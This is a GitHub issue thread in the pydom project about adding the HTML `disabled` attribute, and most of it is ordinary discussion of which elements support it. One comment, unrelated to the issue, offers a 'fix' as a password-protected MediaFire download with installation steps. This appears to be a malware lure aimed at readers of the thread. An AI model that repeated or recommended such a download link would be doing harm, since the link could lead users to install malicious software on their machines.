### ISSUE TITLE
add `disabled` attribute

### ISSUE THREAD

**Issue by elazarcoh** [xpodev/pydom#5]
https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes/disabled

This should be added to `HTMLElement` in [html_element.py](../blob/master/src/pydom/types/html/html_element.py)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by neriyaco** [comment]
From the documentation:

> The disabled attribute is supported by `<button>`, `<fieldset>`, `<optgroup>`, `<option>`, `<select>`, `<textarea>` and `<input>`

**Comment by elazarcoh** [comment]
Hmm interesting. It's working for me on label

**Comment by neriyaco** [comment]
That's odd, you might have something that handles it because in plain HTML it does not have any effect.

**Comment by elazarcoh** [comment]
Maybe the browser supports it. I'm using Edge. It also worked on the example in the link when I set the label to disabled

**Comment by elazarcoh** [comment]
Anyway it's not standard so let's close it
